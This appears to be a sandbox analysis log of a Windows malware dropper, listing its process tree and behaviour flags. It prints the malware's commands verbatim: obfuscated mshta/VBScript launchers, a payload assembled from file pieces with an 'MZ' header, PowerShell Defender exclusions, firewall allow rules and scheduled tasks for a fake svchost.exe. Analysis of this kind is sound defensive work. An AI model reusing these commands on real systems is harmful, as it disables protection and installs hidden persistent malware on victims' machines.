022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 92 PID 1436 wrote to memory of 4640 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 92 PID 1436 wrote to memory of 4936 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 91 PID 1436 wrote to memory of 4936 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 91 PID 1436 wrote to memory of 4936 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 91 PID 1436 wrote to memory of 3736 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 98 PID 1436 wrote to memory of 3736 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 98 PID 1436 wrote to memory of 3736 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 98 PID 1436 wrote to memory of 884 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 97 PID 1436 wrote to memory of 884 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 97 PID 1436 wrote to memory of 884 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 97 PID 1436 wrote to memory of 2964 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 96 PID 1436 wrote to memory of 2964 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 96 PID 1436 wrote to memory of 2964 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 96 PID 1436 wrote to memory of 3312 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 103 PID 1436 wrote to memory of 3312 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 103 PID 1436 wrote to memory of 3312 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 103 PID 1436 wrote to memory of 5036 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 102 PID 1436 wrote to memory of 5036 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 102 PID 1436 wrote to memory of 5036 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 102 PID 1436 wrote to memory of 4196 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 101 PID 1436 wrote to memory of 4196 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 101 PID 1436 wrote to memory of 4196 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 101 PID 1436 wrote to memory of 4532 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 100 PID 1436 wrote to memory of 4532 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 100 PID 1436 wrote to memory of 4532 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 100 PID 1436 wrote to memory of 4760 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 99 PID 1436 wrote to memory of 4760 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 99 PID 1436 wrote to memory of 2088 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 105 PID 1436 wrote to memory of 2088 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 105 PID 1436 wrote to memory of 2088 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 105 PID 1436 wrote to memory of 4076 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 104 PID 1436 wrote to memory of 4076 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 104 PID 1436 wrote to memory of 4076 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 104 PID 1436 wrote to memory of 2172 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Users\Admin\Pictures\Adobe Films\jbA8_s3FlxHrMmUQPOwNJfp8.exe"C:\Users\Admin\Pictures\Adobe Films\jbA8_s3FlxHrMmUQPOwNJfp8.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4728
-
-
C:\Users\Admin\Pictures\Adobe Films\Up_EgQSePP1xxhPBvlLFqEqe.exe"C:\Users\Admin\Pictures\Adobe Films\Up_EgQSePP1xxhPBvlLFqEqe.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:4492 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵PID:5324
-
C:\Users\Admin\AppData\Local\Temp\fl.exe"C:\Users\Admin\AppData\Local\Temp\fl.exe"4⤵PID:4520
-
C:\Users\Admin\AppData\Local\Temp\Curarization.exe"C:\Users\Admin\AppData\Local\Temp\Curarization.exe"5⤵PID:1696
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\97tPLM1BD83QAkW3t_oh9ywr.exe"C:\Users\Admin\Pictures\Adobe Films\97tPLM1BD83QAkW3t_oh9ywr.exe"2⤵
- Executes dropped EXE
PID:4752 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 2923⤵
- Program crash
PID:6088
-
-
-
C:\Users\Admin\Pictures\Adobe Films\6Gjg3NTuW9hb7SqYymgdkeKo.exe"C:\Users\Admin\Pictures\Adobe Films\6Gjg3NTuW9hb7SqYymgdkeKo.exe"2⤵
- Executes dropped EXE
PID:4624 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4624 -s 2963⤵
- Program crash
PID:6084
-
-
-
C:\Users\Admin\Pictures\Adobe Films\tG94gZUleeBFo8SDyi6butFz.exe"C:\Users\Admin\Pictures\Adobe Films\tG94gZUleeBFo8SDyi6butFz.exe"2⤵
- Executes dropped EXE
PID:2680 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2680 -s 3003⤵
- Program crash
PID:5968
-
-
-
C:\Users\Admin\Pictures\Adobe Films\XMGMTu3eQAvQPR86eRMXlDO9.exe"C:\Users\Admin\Pictures\Adobe Films\XMGMTu3eQAvQPR86eRMXlDO9.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1476 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 19843⤵
- Program crash
PID:3204
-
-
-
C:\Users\Admin\Pictures\Adobe Films\yJqr3GGVaG4To30s0MDWLG61.exe"C:\Users\Admin\Pictures\Adobe Films\yJqr3GGVaG4To30s0MDWLG61.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4936
-
-
C:\Users\Admin\Pictures\Adobe Films\KdlTj_CCMiXvvrf22JrhXXT5.exe"C:\Users\Admin\Pictures\Adobe Films\KdlTj_CCMiXvvrf22JrhXXT5.exe"2⤵
- Executes dropped EXE
PID:4640 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 2763⤵
- Program crash
PID:5804
-
-
-
C:\Users\Admin\Pictures\Adobe Films\cTOmx3wyJ995falPyP_CHHr6.exe"C:\Users\Admin\Pictures\Adobe Films\cTOmx3wyJ995falPyP_CHHr6.exe"2⤵
- Executes dropped EXE
PID:768 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 3003⤵
- Program crash
PID:5440
-
-
-
C:\Users\Admin\Pictures\Adobe Films\o6NHz5BzimLqOLMlh9XEgPbX.exe"C:\Users\Admin\Pictures\Adobe Films\o6NHz5BzimLqOLMlh9XEgPbX.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3944 -
C:\Users\Admin\AppData\Roaming\2905016.exe"C:\Users\Admin\AppData\Roaming\2905016.exe"3⤵
- Executes dropped EXE
PID:6140
-
-
C:\Users\Admin\AppData\Roaming\3915497.exe"C:\Users\Admin\AppData\Roaming\3915497.exe"3⤵PID:5116
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵PID:5264
-
-
-
C:\Users\Admin\AppData\Roaming\1955104.exe"C:\Users\Admin\AppData\Roaming\1955104.exe"3⤵PID:5128
-
-
C:\Users\Admin\AppData\Roaming\1210874.exe"C:\Users\Admin\AppData\Roaming\1210874.exe"3⤵PID:5720
-
-
C:\Users\Admin\AppData\Roaming\8799358.exe"C:\Users\Admin\AppData\Roaming\8799358.exe"3⤵PID:1528
-
-
C:\Users\Admin\AppData\Roaming\250902.exe"C:\Users\Admin\AppData\Roaming\250902.exe"3⤵PID:3472
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscRIpT:cLosE ( cREaTeOBjeCT ("wsCriPT.sHELl"). rUN ("Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Roaming\250902.exe"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If """"== """" for %k In ( ""C:\Users\Admin\AppData\Roaming\250902.exe"" ) do taskkill /F /Im ""%~Nxk"" " ,0 , trUE) )4⤵PID:2032
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Roaming\250902.exe"> kSTw_GRvR1eDFi.EXE&&StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ&If ""== "" for %k In ( "C:\Users\Admin\AppData\Roaming\250902.exe" ) do taskkill /F /Im "%~Nxk"5⤵PID:2424
-
C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXEkStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ6⤵PID:4488
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscRIpT:cLosE ( cREaTeOBjeCT ("wsCriPT.sHELl"). rUN ("Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If ""/P6l3hjJm2mK1sJpxUmLJ""== """" for %k In ( ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" ) do taskkill /F /Im ""%~Nxk"" " ,0 , trUE) )7⤵PID:2360
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"> kSTw_GRvR1eDFi.EXE&&StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ&If "/P6l3hjJm2mK1sJpxUmLJ"== "" for %k In ( "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE" ) do taskkill /F /Im "%~Nxk"8⤵PID:3300
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscrIPT: cLOSE( cREATEobjeCt ( "WSCRIPt.SheLL" ). ruN ( "C:\Windows\system32\cmd.exe /q /C echo %DatE%cl1V> 8KyK.ZNp & Echo | sET /P = ""MZ"" > hXUPL.XH& CoPY /b /Y HXUPL.XH + QR7i5Ur.BRU +wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM & StArT control .\GKq1GTV.ZnM " , 0 , TrUe ) )7⤵PID:4732
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C echo ÚtE%cl1V>8KyK.ZNp & Echo | sET /P = "MZ" >hXUPL.XH& CoPY /b /Y HXUPL.XH +QR7i5Ur.BRU +wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM& StArT control .\GKq1GTV.ZnM8⤵PID:5528
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Echo "9⤵PID:3628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>hXUPL.XH"9⤵PID:4564
-
-
C:\Windows\SysWOW64\control.execontrol .\GKq1GTV.ZnM9⤵PID:1320
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\GKq1GTV.ZnM10⤵PID:2664
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /Im "250902.exe"6⤵
- Kills process with taskkill
PID:5772
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\848820.exe"C:\Users\Admin\AppData\Roaming\848820.exe"3⤵PID:4940
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ZvQmBbFSxCcYQP4fGiwTawkt.exe"C:\Users\Admin\Pictures\Adobe Films\ZvQmBbFSxCcYQP4fGiwTawkt.exe"2⤵
- Executes dropped EXE
PID:4400
-
-
C:\Users\Admin\Pictures\Adobe Films\XATuOQAsPCyh5ifJCHUEKp4p.exe"C:\Users\Admin\Pictures\Adobe Films\XATuOQAsPCyh5ifJCHUEKp4p.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2964 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:5608
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:3792
-
-
C:\Users\Admin\Documents\wkqlUMWTeA4MzwNheOfGeZIF.exe"C:\Users\Admin\Documents\wkqlUMWTeA4MzwNheOfGeZIF.exe"3⤵PID:5424
-
C:\Users\Admin\Pictures\Adobe Films\byAMTPsi0wjZyzTcnGrAnURo.exe"C:\Users\Admin\Pictures\Adobe Films\byAMTPsi0wjZyzTcnGrAnURo.exe"4⤵PID:504
-
-
C:\Users\Admin\Pictures\Adobe Films\lOxrLkIZuQMAQx5v4HoaEB9b.exe"C:\Users\Admin\Pictures\Adobe Films\lOxrLkIZuQMAQx5v4HoaEB9b.exe"4⤵PID:4080
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 3005⤵
- Program crash
PID:4172
-
-
-
C:\Users\Admin\Pictures\Adobe Films\wcnBXcNqNjGhlzUr2QOQS7bQ.exe"C:\Users\Admin\Pictures\Adobe Films\wcnBXcNqNjGhlzUr2QOQS7bQ.exe"4⤵PID:3036
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\wcnBXcNqNjGhlzUr2QOQS7bQ.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\wcnBXcNqNjGhlzUr2QOQS7bQ.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )5⤵PID:3492
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\wcnBXcNqNjGhlzUr2QOQS7bQ.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\wcnBXcNqNjGhlzUr2QOQS7bQ.exe" ) do taskkill -f -iM "%~NxM"6⤵PID:1068
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi7⤵PID:5636
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵PID:456
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"9⤵PID:3660
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "wcnBXcNqNjGhlzUr2QOQS7bQ.exe"7⤵
- Kills process with taskkill
PID:104
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\4Jy2g3hpKf38lVQDNfIL6jtp.exe"C:\Users\Admin\Pictures\Adobe Films\4Jy2g3hpKf38lVQDNfIL6jtp.exe"4⤵PID:5244
-
-
C:\Users\Admin\Pictures\Adobe Films\n0XA6WpRiv72ADyrBgNcyvZr.exe"C:\Users\Admin\Pictures\Adobe Films\n0XA6WpRiv72ADyrBgNcyvZr.exe"4⤵PID:5044
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 17285⤵
- Program crash
PID:1560
-
-
-
C:\Users\Admin\Pictures\Adobe Films\uwcqTvoJZyFzdwFOrgjLNk3L.exe"C:\Users\Admin\Pictures\Adobe Films\uwcqTvoJZyFzdwFOrgjLNk3L.exe"4⤵PID:2360
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 3005⤵
- Program crash
PID:2156
-
-
-
C:\Users\Admin\Pictures\Adobe Films\rWYYU7N_3Z5NV5mnXDAZrzLw.exe"C:\Users\Admin\Pictures\Adobe Films\rWYYU7N_3Z5NV5mnXDAZrzLw.exe"4⤵PID:2164
-
-
C:\Users\Admin\Pictures\Adobe Films\8syYjhN1kDn7VeWxv1eGSMvd.exe"C:\Users\Admin\Pictures\Adobe Films\8syYjhN1kDn7VeWxv1eGSMvd.exe"4⤵
- Executes dropped EXE
PID:5116 -
C:\Users\Admin\Pictures\Adobe Films\8syYjhN1kDn7VeWxv1eGSMvd.exe"C:\Users\Admin\Pictures\Adobe Films\8syYjhN1kDn7VeWxv1eGSMvd.exe" -u5⤵PID:2212
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mEVi6awdxn3B5TPdUOnnLpe4.exe"C:\Users\Admin\Pictures\Adobe Films\mEVi6awdxn3B5TPdUOnnLpe4.exe"4⤵PID:5184
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=15⤵PID:2852
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mVRZrkcUJS1yczCv3qSCSgz0.exe"C:\Users\Admin\Pictures\Adobe Films\mVRZrkcUJS1yczCv3qSCSgz0.exe"4⤵PID:4140
-
C:\Users\Admin\AppData\Local\Temp\is-902FK.tmp\mVRZrkcUJS1yczCv3qSCSgz0.tmp"C:\Users\Admin\AppData\Local\Temp\is-902FK.tmp\mVRZrkcUJS1yczCv3qSCSgz0.tmp" /SL5="$402A8,506127,422400,C:\Users\Admin\Pictures\Adobe Films\mVRZrkcUJS1yczCv3qSCSgz0.exe"5⤵PID:2568
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\dsqTtt9nQpWwz1yYMBAEipS6.exe"C:\Users\Admin\Pictures\Adobe Films\dsqTtt9nQpWwz1yYMBAEipS6.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:884
-
-
C:\Users\Admin\Pictures\Adobe Films\wn6Tr5ouTTYnpiBNWaXIcaFu.exe"C:\Users\Admin\Pictures\Adobe Films\wn6Tr5ouTTYnpiBNWaXIcaFu.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3736
-
-
C:\Users\Admin\Pictures\Adobe Films\IDyIlZ0vcJMZmpFNQrobzffX.exe"C:\Users\Admin\Pictures\Adobe Films\IDyIlZ0vcJMZmpFNQrobzffX.exe"2⤵
- Executes dropped EXE
PID:4760 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵PID:5688
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3184
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \3⤵PID:4912
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵PID:5348
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM3⤵
- Suspicious use of SetThreadContext
- Creates scheduled task(s)
PID:3312 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:768
-
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵PID:5900
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal3⤵PID:5736
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵PID:3848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \4⤵PID:5876
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵PID:2032
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵PID:5944
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\cBHStp1tUjbmpWGPeFPixzx7.exe"C:\Users\Admin\Pictures\Adobe Films\cBHStp1tUjbmpWGPeFPixzx7.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4532
-
-
C:\Users\Admin\Pictures\Adobe Films\33CEtghZf4kJPxQoBSqEUgkF.exe"C:\Users\Admin\Pictures\Adobe Films\33CEtghZf4kJPxQoBSqEUgkF.exe"2⤵
- Executes dropped EXE
PID:4196
-
-
C:\Users\Admin\Pictures\Adobe Films\kMCLvaZxUoL4ETDwWQqOc6MX.exe"C:\Users\Admin\Pictures\Adobe Films\kMCLvaZxUoL4ETDwWQqOc6MX.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:5036 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵PID:2044
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 5603⤵
- Drops file in Windows directory
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5832
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Gn5a2G1hE46fGK_8y4mb1keQ.exe"C:\Users\Admin\Pictures\Adobe Films\Gn5a2G1hE46fGK_8y4mb1keQ.exe"2⤵
- Executes dropped EXE
PID:3312 -
C:\Users\Admin\Pictures\Adobe Films\Gn5a2G1hE46fGK_8y4mb1keQ.exe"C:\Users\Admin\Pictures\Adobe Films\Gn5a2G1hE46fGK_8y4mb1keQ.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:6048
-
-
-
C:\Users\Admin\Pictures\Adobe Films\LPvnU5MCa7evfTEqGJQeEKaS.exe"C:\Users\Admin\Pictures\Adobe Films\LPvnU5MCa7evfTEqGJQeEKaS.exe"2⤵
- Executes dropped EXE
PID:4076 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 2043⤵
- Program crash
PID:6080
-
-
-
C:\Users\Admin\Pictures\Adobe Films\DJQTgMZwK7ZPTQPNMIvPAKa5.exe"C:\Users\Admin\Pictures\Adobe Films\DJQTgMZwK7ZPTQPNMIvPAKa5.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2088 -
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
- Executes dropped EXE
PID:1832
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Cf1aoIESdkQ91XunX7mxtiH7.exe"C:\Users\Admin\Pictures\Adobe Films\Cf1aoIESdkQ91XunX7mxtiH7.exe"2⤵
- Executes dropped EXE
PID:3184
-
-
C:\Users\Admin\Pictures\Adobe Films\D9RJLCLd2f8688ZYCUxUkMQi.exe"C:\Users\Admin\Pictures\Adobe Films\D9RJLCLd2f8688ZYCUxUkMQi.exe"2⤵
- Executes dropped EXE
PID:2172 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\D9RJLCLd2f8688ZYCUxUkMQi.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\D9RJLCLd2f8688ZYCUxUkMQi.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )3⤵PID:4304
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\D9RJLCLd2f8688ZYCUxUkMQi.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\D9RJLCLd2f8688ZYCUxUkMQi.exe" ) do taskkill -im "%~NxK" -F4⤵PID:5412
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP5⤵PID:5780
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )6⤵PID:3420
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F7⤵PID:1940
-
-
-
